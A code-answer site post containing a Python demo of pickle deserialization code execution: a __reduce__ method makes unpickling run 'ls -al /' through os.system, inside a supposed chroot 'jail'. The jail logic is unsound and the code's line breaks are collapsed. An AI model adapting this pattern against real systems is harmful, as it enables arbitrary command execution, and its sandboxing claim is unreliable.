Answers for "testo"

0

testo

import osimport picklefrom contextlib import contextmanager class ShellExploit(object):    def __reduce__(self):        # this will list contents of root / folder.        return (os.system, ('ls -al /',)) @contextmanagerdef system_jail():    """ A simple chroot jail """        os.chroot('Sample jail/')    yield    os.chroot('/')        def serialize():    with system_jail():        shellcode = pickle.dumps(ShellExploit())        return shellcode def deserialize(exploit_code):    with system_jail():        pickle.loads(exploit_code) if __name__ == '__main__':    shellcode = serialize()    deserialize(shellcode)
Posted by: Guest on September-03-2021

Browse Popular Code Answers by Language